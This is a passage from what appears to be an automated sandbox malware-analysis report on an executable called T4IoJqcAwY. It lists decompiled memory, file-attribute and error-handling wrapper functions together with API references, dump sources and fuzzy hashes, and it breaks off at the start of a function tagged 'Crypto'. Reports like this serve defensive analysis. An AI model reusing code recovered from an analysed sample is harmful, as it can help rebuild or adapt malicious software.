                                                                                                                            • Associated: 00000000.00000002.289613327.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.289618199.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.289623098.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_T4IoJqcAwY.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CreateDirectory
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 4241100979-0
                                                                                                                            • Opcode ID: 083f4dbc4f2943f1dfb74f92bb0e451d38530cc52b4985dcc65b559a9f8fdd7c
                                                                                                                            • Instruction ID: 34323f3862c9c6fd2d35131ea61d74e0925f70aef560595d1f96e53f70211f96
                                                                                                                            • Opcode Fuzzy Hash: 083f4dbc4f2943f1dfb74f92bb0e451d38530cc52b4985dcc65b559a9f8fdd7c
                                                                                                                            • Instruction Fuzzy Hash: 70A0223030030083E2200B300E0AB0F280CAF08AC0F00C0283208C80E0EB28C0200008
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00404DA0 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 100%
                                                                                                                            			E00404DA0(WCHAR* __ecx) {
				long _t1;

				_t1 = GetFileAttributesW(__ecx); // executed
				if(_t1 == 0xffffffff) {
					return _t1;
				}
				return _t1;
			}




                                                                                                                            0x00404da1
                                                                                                                            0x00404daa
                                                                                                                            0x00000000
                                                                                                                            0x00404dac
                                                                                                                            0x00404dae

                                                                                                                            APIs
                                                                                                                            • GetFileAttributesW.KERNELBASE(?,004050D2,?,?,0000002A,0000005C,?,?,?,00000001), ref: 00404DA1
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.289596243.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.289591053.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.289613327.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.289618199.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.289623098.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_T4IoJqcAwY.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: AttributesFile
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3188754299-0
                                                                                                                            • Opcode ID: 81aac6498f9a46e99a08266c3e76ab7939904c505e4d4e367c054e885d8591d5
                                                                                                                            • Instruction ID: 591aceaef49bad6d6e0eb818f5c395ad730c6046851bbff497a631cd11e1eb05
                                                                                                                            • Opcode Fuzzy Hash: 81aac6498f9a46e99a08266c3e76ab7939904c505e4d4e367c054e885d8591d5
                                                                                                                            • Instruction Fuzzy Hash: 07A011A0820000828A2003302C8808A2A808882332B208B20E230C00E0CB38C800A2A8
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00406749 Relevance: 1.3, APIs: 1, Instructions: 38COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 58%
                                                                                                                            			E00406749(intOrPtr _a4, intOrPtr _a8, char _a12, intOrPtr* _a16) {
				void* _t11;
				signed int _t12;
				signed int _t14;
				intOrPtr* _t19;
				signed int _t20;
				intOrPtr _t23;

				_t23 = _a4;
				_t11 = E004053EE(_a8, _a12,  &_a12); // executed
				_t19 = _a16;
				if(_t19 != 0) {
					 *_t19 = _a12;
				}
				if(_t11 != 0) {
					return 0;
				}
				_t12 = GetLastError();
				_t20 =  *(_t23 + 0x1c);
				__eflags = _t20;
				if(_t20 != 0) {
					return  *((intOrPtr*)( *_t20))( *((intOrPtr*)(_t23 + 0x20)), _t12);
				}
				__eflags = _t12;
				if(__eflags == 0) {
					return 0x80004005;
				}
				if(__eflags > 0) {
					_t14 = _t12 & 0x0000ffff | 0x80070000;
					__eflags = _t14;
					return _t14;
				}
				return _t12;
			}









                                                                                                                            0x00406750
                                                                                                                            0x0040675d
                                                                                                                            0x00406762
                                                                                                                            0x00406767
                                                                                                                            0x0040676c
                                                                                                                            0x0040676c
                                                                                                                            0x00406770
                                                                                                                            0x00000000
                                                                                                                            0x00406772
                                                                                                                            0x00406776
                                                                                                                            0x0040677c
                                                                                                                            0x0040677f
                                                                                                                            0x00406781
                                                                                                                            0x00000000
                                                                                                                            0x00406789
                                                                                                                            0x0040678d
                                                                                                                            0x0040678f
                                                                                                                            0x00000000
                                                                                                                            0x00406791
                                                                                                                            0x00406798
                                                                                                                            0x0040679f
                                                                                                                            0x0040679f
                                                                                                                            0x00000000
                                                                                                                            0x0040679f
                                                                                                                            0x004067a6

                                                                                                                            APIs
                                                                                                                            • GetLastError.KERNEL32(?,?,?), ref: 00406776
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.289596243.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.289591053.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.289613327.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.289618199.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.289623098.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_T4IoJqcAwY.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ErrorLast
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1452528299-0
                                                                                                                            • Opcode ID: 663c19575a8456751b998b43a00a15bb72bda6945b96a8155ca3274f1c07a7d2
                                                                                                                            • Instruction ID: a9f0ad8659e0c22b9764d8725ef8c1a002e24048339c74b3f33957f6e1008843
                                                                                                                            • Opcode Fuzzy Hash: 663c19575a8456751b998b43a00a15bb72bda6945b96a8155ca3274f1c07a7d2
                                                                                                                            • Instruction Fuzzy Hash: E6F03C392002069BDF249F64DC009BB77A9EF45318B11453AAC17EB294D37AE8219BA9
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00413840 Relevance: 1.3, APIs: 1, Instructions: 17COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 100%
                                                                                                                            			E00413840(void* __edx) {
				int _t4;
				void* _t6;
				signed int _t8;
				void* _t9;

				_t4 = __edx + 0x80;
				if(_t4 >= __edx) {
					if(_t4 == 0) {
						goto L1;
					} else {
						_t6 = malloc(_t4); // executed
						_t9 = _t6;
						if(_t9 == 0) {
							goto L1;
						} else {
							_t2 = _t9 + 0x80; // 0x80
							_t8 = _t2 & 0xffffff80;
							 *(_t8 - 4) = _t9;
							return _t8;
						}
					}
				} else {
					L1:
					return 0;
				}
			}







                                                                                                                            0x00413840
                                                                                                                            0x00413848
                                                                                                                            0x0041384f
                                                                                                                            0x00000000
                                                                                                                            0x00413851
                                                                                                                            0x00413852
                                                                                                                            0x00413858
                                                                                                                            0x0041385f
                                                                                                                            0x00000000
                                                                                                                            0x00413861
                                                                                                                            0x00413861
                                                                                                                            0x00413867
                                                                                                                            0x0041386a
                                                                                                                            0x0041386d
                                                                                                                            0x0041386d
                                                                                                                            0x0041385f
                                                                                                                            0x0041384a
                                                                                                                            0x0041384a
                                                                                                                            0x0041384c
                                                                                                                            0x0041384c

                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.289596243.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.289591053.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.289613327.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.289618199.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.289623098.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_T4IoJqcAwY.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: malloc
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2803490479-0
                                                                                                                            • Opcode ID: d17c0ca2ced44424d2f780bba9c87b2715d3c144875a3533d3fe3f075a9b9a59
                                                                                                                            • Instruction ID: 9af5a8c9999b4a2f38037104a0b4c214d35f1fab808fcbcdec8469b5e69bc05e
                                                                                                                            • Opcode Fuzzy Hash: d17c0ca2ced44424d2f780bba9c87b2715d3c144875a3533d3fe3f075a9b9a59
                                                                                                                            • Instruction Fuzzy Hash: 6AD05E7021220146EF489F20C949796B2D47F50613F58857AF853CAA91FB2CC6948648
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00413790 Relevance: 1.3, APIs: 1, Instructions: 10memoryCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 100%
                                                                                                                            			E00413790(long __ecx) {
				void* _t1;

				if(__ecx != 0) {
					_t1 = VirtualAlloc(0, __ecx, 0x1000, 4); // executed
					return _t1;
				} else {
					return 0;
				}
			}




                                                                                                                            0x00413792
                                                                                                                            0x004137a1
                                                                                                                            0x004137a7
                                                                                                                            0x00413794
                                                                                                                            0x00413796
                                                                                                                            0x00413796

                                                                                                                            APIs
                                                                                                                            • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004,00410F60), ref: 004137A1
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.289596243.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.289591053.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.289613327.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.289618199.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.289623098.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_T4IoJqcAwY.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: AllocVirtual
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 4275171209-0
                                                                                                                            • Opcode ID: 98dbc30ccae0949d29e9745611a8297d10c42e2999911135f846b2ac1735627b
                                                                                                                            • Instruction ID: 26fcc7a4b7f8066c4caec3dd40339106bc2c663ef6f5d49925e7066ee81a0dd4
                                                                                                                            • Opcode Fuzzy Hash: 98dbc30ccae0949d29e9745611a8297d10c42e2999911135f846b2ac1735627b
                                                                                                                            • Instruction Fuzzy Hash: 29B012F07A128035FE6807214D0FFFB5A509348B5BF0081B8B715D80C4E7D05440511C
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00413803 Relevance: 1.3, APIs: 1, Instructions: 9memoryCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 16%
                                                                                                                            			E00413803(void* __eax, void* __ebx, long __edx, void* __esi) {
				intOrPtr* _t2;
				void* _t3;

				asm("rol bl, 0x6a");
				_t2 = __eax + 0x68;
				 *_t2 =  *_t2 + __edx;
				 *_t2 =  *_t2 + _t2;
				_t3 = VirtualAlloc(0, __edx, ??, ??); // executed
				return _t3;
			}





                                                                                                                            0x00413805
                                                                                                                            0x00413808
                                                                                                                            0x0041380a
                                                                                                                            0x0041380c
                                                                                                                            0x00413811
                                                                                                                            0x00413817

                                                                                                                            APIs
                                                                                                                            • VirtualAlloc.KERNELBASE(00000000), ref: 00413811
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.289596243.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.289591053.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.289613327.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.289618199.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.289623098.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_T4IoJqcAwY.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: AllocVirtual
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 4275171209-0
                                                                                                                            • Opcode ID: 92735ca84e52f538702ecb6ec21f91555a91a8bffad8afd78f3bc7818ee4d028
                                                                                                                            • Instruction ID: e03e2c2186c6dbf214b011caf4efa4a81c4bf758aef5a93a91a1cadcfefd29ca
                                                                                                                            • Opcode Fuzzy Hash: 92735ca84e52f538702ecb6ec21f91555a91a8bffad8afd78f3bc7818ee4d028
                                                                                                                            • Instruction Fuzzy Hash: 53C08CE1A4D2809FDF0213108C407703F308B8B300F0A00C1E9045B092C2000808C722
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00413760 Relevance: 1.3, APIs: 1, Instructions: 8COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 100%
                                                                                                                            			E00413760(int __ecx) {
				void* _t1;

				if(__ecx != 0) {
					_t1 = malloc(__ecx); // executed
					return _t1;
				} else {
					return 0;
				}
			}




                                                                                                                            0x00413762
                                                                                                                            0x00413768
                                                                                                                            0x00413771
                                                                                                                            0x00413764
                                                                                                                            0x00413766
                                                                                                                            0x00413766

                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.289596243.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.289591053.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.289613327.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.289618199.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.289623098.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_T4IoJqcAwY.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: malloc
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2803490479-0
                                                                                                                            • Opcode ID: 4e4b97c8df32ee9fc110583acaac8f3580eb89f53c0fc54fed573577a25b04ae
                                                                                                                            • Instruction ID: e9a776f8b561c7906f99c97af60905b4207f6b767d51b374da93a018ac2131ba
                                                                                                                            • Opcode Fuzzy Hash: 4e4b97c8df32ee9fc110583acaac8f3580eb89f53c0fc54fed573577a25b04ae
                                                                                                                            • Instruction Fuzzy Hash: 3FB012F012114012EE1C17382D2819730407640A47BC08478B402C0120F719C114504E
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 004137D0 Relevance: 1.3, APIs: 1, Instructions: 8COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 100%
                                                                                                                            			E004137D0(int __edx) {
				void* _t1;

				if(__edx != 0) {
					_t1 = malloc(__edx); // executed
					return _t1;
				} else {
					return 0;
				}
			}




                                                                                                                            0x004137d2
                                                                                                                            0x004137d8
                                                                                                                            0x004137e1
                                                                                                                            0x004137d4
                                                                                                                            0x004137d6
                                                                                                                            0x004137d6

                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.289596243.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.289591053.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.289613327.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.289618199.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.289623098.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_T4IoJqcAwY.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: malloc
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2803490479-0
                                                                                                                            • Opcode ID: ec48c67d9d884d5c2e1c8e50903b5e665513c9d58559f81f173c0722ca0cd9cf
                                                                                                                            • Instruction ID: e1834bf87b784a365167bfedfb21307e6a78aa9792587d0fbed25970968ed474
                                                                                                                            • Opcode Fuzzy Hash: ec48c67d9d884d5c2e1c8e50903b5e665513c9d58559f81f173c0722ca0cd9cf
                                                                                                                            • Instruction Fuzzy Hash: C6B012E8A101C012DA040B342C081933062B6D0507BC4C4B5A40180124FB28D114604D
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00413870 Relevance: 1.3, APIs: 1, Instructions: 7COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 100%
                                                                                                                            			E00413870(void* __edx) {
				void* _t2;
				void* _t3;

				if(__edx != 0) {
					_t3 =  *(__edx - 4);
					free(_t3); // executed
					return _t3;
				}
				return _t2;
			}





                                                                                                                            0x00413872
                                                                                                                            0x00413874
                                                                                                                            0x00413878
                                                                                                                            0x00000000
                                                                                                                            0x0041387e
                                                                                                                            0x0041387f

                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.289596243.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.289591053.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.289613327.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.289618199.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.289623098.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_T4IoJqcAwY.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: free
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1294909896-0
                                                                                                                            • Opcode ID: 08ada9012d3aa8b37d6d1a895f5f94b9464adf61227ada9af42ee5a2db097504
                                                                                                                            • Instruction ID: 12031c54dde89f87e40f0455a88b40bcc2ec3c50dd90033726b53ba6ce8cab4c
                                                                                                                            • Opcode Fuzzy Hash: 08ada9012d3aa8b37d6d1a895f5f94b9464adf61227ada9af42ee5a2db097504
                                                                                                                            • Instruction Fuzzy Hash: 2DB012B590000197CA046BA6940C596F767F698252335C195F50286110CB34C5404704
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 004137B0 Relevance: 1.3, APIs: 1, Instructions: 7COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 100%
                                                                                                                            			E004137B0(void* __ecx) {
				void* _t1;
				int _t2;

				if(__ecx != 0) {
					_t2 = VirtualFree(__ecx, 0, 0x8000); // executed
					return _t2;
				}
				return _t1;
			}





                                                                                                                            0x004137b2
                                                                                                                            0x004137bc
                                                                                                                            0x00000000
                                                                                                                            0x004137bc
                                                                                                                            0x004137c2

                                                                                                                            APIs
                                                                                                                            • VirtualFree.KERNELBASE(?,00000000,00008000,00410F00), ref: 004137BC
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.289596243.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.289591053.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.289613327.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.289618199.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.289623098.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_T4IoJqcAwY.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: FreeVirtual
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1263568516-0
                                                                                                                            • Opcode ID: c36a5560efd41710e5581d1eccf0ebd167bcd73a9656c6fea769c839155dd278
                                                                                                                            • Instruction ID: ab9a27aee94bf2fca4435cde870002c3b791476ff69122d908e4da98a3939ee1
                                                                                                                            • Opcode Fuzzy Hash: c36a5560efd41710e5581d1eccf0ebd167bcd73a9656c6fea769c839155dd278
                                                                                                                            • Instruction Fuzzy Hash: D3B012B074130121FD3847100C05B772500A70CF02F20C0587111640C0C6549404450C
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00413823 Relevance: 1.3, APIs: 1, Instructions: 6COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 58%
                                                                                                                            			E00413823(void* __edx) {
				int _t1;

				_push(cs);
				_t1 = VirtualFree(__edx, 0, 0x8000); // executed
				return _t1;
			}




                                                                                                                            0x00413823
                                                                                                                            0x0041382c
                                                                                                                            0x00413832

                                                                                                                            APIs
                                                                                                                            • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 0041382C
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.289596243.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.289591053.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.289613327.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.289618199.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.289623098.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_T4IoJqcAwY.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: FreeVirtual
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1263568516-0
                                                                                                                            • Opcode ID: 2cf424f09b2a63611f94bf1ef2906656b3368afbdbde5470752f6eddb9b02e63
                                                                                                                            • Instruction ID: 4548bb9808f7885787c00c4898e7365c481cb8737fbf7d0afeb7407147252edf
                                                                                                                            • Opcode Fuzzy Hash: 2cf424f09b2a63611f94bf1ef2906656b3368afbdbde5470752f6eddb9b02e63
                                                                                                                            • Instruction Fuzzy Hash: 5BA00278A8070476ED60A7306D4FFB63A25B78CF01F30C5947251690D0EAE460489A5C
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00403204 Relevance: 1.3, APIs: 1, Instructions: 4COMMONLIBRARYCODE
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 100%
                                                                                                                            			E00403204(void* __eax, void* _a4) {
				void* _t2;

				_t2 = __eax;
				free(_a4); // executed
				return _t2;
			}




                                                                                                                            0x00403204
                                                                                                                            0x00403208
                                                                                                                            0x0040320f

                                                                                                                            APIs
                                                                                                                            • free.MSVCRT(00000000,004037A4,?,?,00000000,?,?,?,00403083,?,?,?,?,00000000,0040108B), ref: 00403208
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.289596243.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.289591053.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.289613327.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.289618199.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.289623098.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_T4IoJqcAwY.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: free
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1294909896-0
                                                                                                                            • Opcode ID: 08b37fb6211b880a57e7f7b25606ba6c70778568a1df338add4bdb7f5ff5f10b
                                                                                                                            • Instruction ID: 051098a63fa4cf3000d2175153d9286f598448f5614b51fb0f0108fed467fd2d
                                                                                                                            • Opcode Fuzzy Hash: 08b37fb6211b880a57e7f7b25606ba6c70778568a1df338add4bdb7f5ff5f10b
                                                                                                                            • Instruction Fuzzy Hash: F6A00271005100EBCA051B60ED19499BB61EB89662B31C4A9F18740471CB318820BA45
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 004137F0 Relevance: 1.3, APIs: 1, Instructions: 4COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 100%
                                                                                                                            			E004137F0(void* __eax, void* __edx) {
				void* _t1;

				_t1 = __eax;
				free(__edx); // executed
				return _t1;
			}




                                                                                                                            0x004137f0
                                                                                                                            0x004137f1
                                                                                                                            0x004137f8

                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.289596243.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.289591053.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.289613327.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.289618199.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.289623098.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_T4IoJqcAwY.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: free
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1294909896-0
                                                                                                                            • Opcode ID: c4c572d9f57696b8c0e6e1de3699c55fb71bdc43637c77fb16101d20eef8a5fa
                                                                                                                            • Instruction ID: 7c1fef89f0bccb1a01165ba8deb7b600c8a857a7521b8ae7fdf9e2709f779900
                                                                                                                            • Opcode Fuzzy Hash: c4c572d9f57696b8c0e6e1de3699c55fb71bdc43637c77fb16101d20eef8a5fa
                                                                                                                            • Instruction Fuzzy Hash:
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00413780 Relevance: 1.3, APIs: 1, Instructions: 4COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • free.MSVCRT(?,?,?,00413148), ref: 00413781
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.289596243.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.289591053.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.289613327.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.289618199.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.289623098.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_T4IoJqcAwY.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: free
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1294909896-0
                                                                                                                            • Opcode ID: f7127e7e40eaa2db84907b96d6c7057def2c4eed74b735c5d7bd95b468904d09
                                                                                                                            • Instruction ID: 082e6f8f9fdc4bbf4c0095df6602c445876609eb90aa96d1f6ec716ecc535606
                                                                                                                            • Opcode Fuzzy Hash: f7127e7e40eaa2db84907b96d6c7057def2c4eed74b735c5d7bd95b468904d09
                                                                                                                            • Instruction Fuzzy Hash:
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Non-executed Functions

                                                                                                                            Function 00410138 Relevance: 3.5, APIs: 2, Instructions: 480COMMONCrypto
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 92%
                                                                                                                            			E00410138(void* __ecx, signed int __edx, void* __eflags) {
				intOrPtr __ebx;
